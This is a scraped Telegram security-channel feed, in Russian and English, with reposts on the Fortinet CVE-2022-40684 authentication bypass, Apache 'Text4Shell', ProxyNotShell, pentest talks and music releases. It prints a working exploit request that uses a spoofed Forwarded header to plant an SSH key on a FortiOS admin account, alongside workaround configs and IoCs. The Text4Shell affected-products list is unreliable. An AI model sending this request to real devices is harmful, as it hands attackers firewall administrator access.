Proof of Concept for FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
https://github.com/horizon3ai/CVE-2022-40684
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }https://github.com/horizon3ai/CVE-2022-40684
GitHub
GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and …
A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager - horizon3ai/CVE-2022-40684
🔥1
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
Workaround (Заплатка на жопу):
FortiOS:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list:
Создать Address Group:
Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
FortiProxy:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list для доступа к порту 1:
FortiSwitchManager:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
user=«Local_Process_Acess»Workaround (Заплатка на жопу):
FortiOS:
Отключить
Настроить access list:
config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
endСоздать Address Group:
config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
endСоздать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
endFortiProxy:
Отключить
Настроить access list для доступа к порту 1:
config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
endFortiSwitchManager:
Отключить
Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
FortiGuard Labs
PSIRT | FortiGuard Labs
None
🔥1
Forwarded from k8s (in)security (Дмитрий Евдокимов)
В сети стала доступна видеозапись доклад "Pentesting Kubernetes: From Zero to Hero" (и слайды) от моего коллеги Сергея Канибора с
Данный доклад скорее является
Если вы только начинаете свой путь в этом направлении, то это прям
VolgaCTF 2022!Данный доклад скорее является
RoadMap, а не полной инструкцией по пентесту Kubernetes. Уместить некоторые моменты в пределах одного доклада не представляется возможным. Так же как и рассказать о всех возможных техниках и нюансах с которыми можно столкнуться при пентесте Kubernetes кластера. Но мы постарались это рассказать максимально компактно и понятно. Если вы только начинаете свой путь в этом направлении, то это прям
MUST WATCH!YouTube
Pentesting Kubernetes: From Zero to Hero / Сергей Канибор / VolgaCTF 2022
Слайды: http://archive.volgactf.ru/volgactf_2022/slides/VolgaCTF_2022_Kanibor.pdf
Pentesting Kubernetes: From Zero to Hero
Спикер: Сергей Канибор, Luntry
________________________
Pentesting Kubernetes: From Zero to Hero
by Sergey Kanibor, Luntry
Pentesting Kubernetes: From Zero to Hero
Спикер: Сергей Канибор, Luntry
________________________
Pentesting Kubernetes: From Zero to Hero
by Sergey Kanibor, Luntry
Forwarded from novitoll_ch (novitoll)
Мой доклад на OpenSysConf'22
sysconf.io
Спасибо @sysadm_in за очередную конфу
https://docs.google.com/presentation/d/1CRWNejM3eZsluQrysvqlDPxy1g_oIaiQ04eB1uNFqmI/edit?usp=sharing
sysconf.io
Спасибо @sysadm_in за очередную конфу
https://docs.google.com/presentation/d/1CRWNejM3eZsluQrysvqlDPxy1g_oIaiQ04eB1uNFqmI/edit?usp=sharing
Google Docs
5_2022_Oct14_sysconf_practical_experience_with_4G
Practical experience with 4G Sabyrzhan “novitoll” Tasbolatov Open SysConf’22, Almaty
🔥1
Forwarded from SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
🔥1
#DUBSTEP #WAV
786MK001: VA – MORTAL KOMBO #1 EP
Vinyl is OUt Of StoCk..
Only digital form is available on 786 Website.
8 DUBSTEP SUPERHEROES.
4 DEADLY COMBINATIONS.
786MK is MORTAL KOMBO. A new dangerous series.
A collection of 4 spicy collaborations, cooked by some of the most dangerous dubstep producers in the scene.
786MK001: VA – MORTAL KOMBO #1 EP
Vinyl is OUt Of StoCk..
Only digital form is available on 786 Website.
8 DUBSTEP SUPERHEROES.
4 DEADLY COMBINATIONS.
786MK is MORTAL KOMBO. A new dangerous series.
A collection of 4 spicy collaborations, cooked by some of the most dangerous dubstep producers in the scene.
A1. Mr.K & DPRTNDRP – Suppression Dub
A2. Quasar & nova – Witchcraft Dub
B1. Saule & Centauri – Tyrant
B2. Teffa & Sound Unknown – Hide & Seek👍1🔥1
Forwarded from OFFZONE
Наконец-то собрали все записи докладов в плейлисты. Выкладываем их в одном посте, чтобы было удобнее искать📰
— Track 1
— Track 2
— AppSec.Zone
— Finance.Zone
— DC&HW.Zone
— Track 1
— Track 2
— AppSec.Zone
— Finance.Zone
— DC&HW.Zone
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Георгий Кигурадзе. Небольшая OPPOлошность. История исследования 5G‑роутера
Доклад об исследовании безопасности 5G‑роутера компании OPPO. Будет рассказано, как удалось получить RCE, не имея прошивки и не прибегая к аппаратному воздействию на устройство. Также будут продемонстрированы другие найденные уязвимости.
Forwarded from Mikrotik Ninja
Пару-тройку недель назад гугл анонсировал свой новый CTF
Если хотите почувстовать себя хакером - добро пожаловать! Я не продвинулся дальше первого уровня ))
Но пост о другом. В рамках этого проекта гуглеры сняли серию видосов про ИБ. И это что-то абсолютно великолепное. Каждая двадцатиминутная серия захватывает как хороший детектив.
Крайне рекомендую посмотреть. Если у вас плохо с английским, то говорят, что Яндекс бразуер умеет переводить видео на лету, сам не проверял
https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H
Если хотите почувстовать себя хакером - добро пожаловать! Я не продвинулся дальше первого уровня ))
Но пост о другом. В рамках этого проекта гуглеры сняли серию видосов про ИБ. И это что-то абсолютно великолепное. Каждая двадцатиминутная серия захватывает как хороший детектив.
Крайне рекомендую посмотреть. Если у вас плохо с английским, то говорят, что Яндекс бразуер умеет переводить видео на лету, сам не проверял
https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H
S02E45
VISION Radio
This week's VISION Radio kicks off by premiering the brand new Thys & Two Fingers. 'Hodo' is out this Friday. Plus new music by Black Sun Empire & Rido, Prestige, The Caracal Project, Mr Carmack and more.. Enjoy!#noisia #thys #amontobin #twofingers
https://soundcloud.com/visionrecordings/vision-radio-s02e45
🔥2
Forwarded from APT
💣 ProxyNotShell PoC
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.me/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.me/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce